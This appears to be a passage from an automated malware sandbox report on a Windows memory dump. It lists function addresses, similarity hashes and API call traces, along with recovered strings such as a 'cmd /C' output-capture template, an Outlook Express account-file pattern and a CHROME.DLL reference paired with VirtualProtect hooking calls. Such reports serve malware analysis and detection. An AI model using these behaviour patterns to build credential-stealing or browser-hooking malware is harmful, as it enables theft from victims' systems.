  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
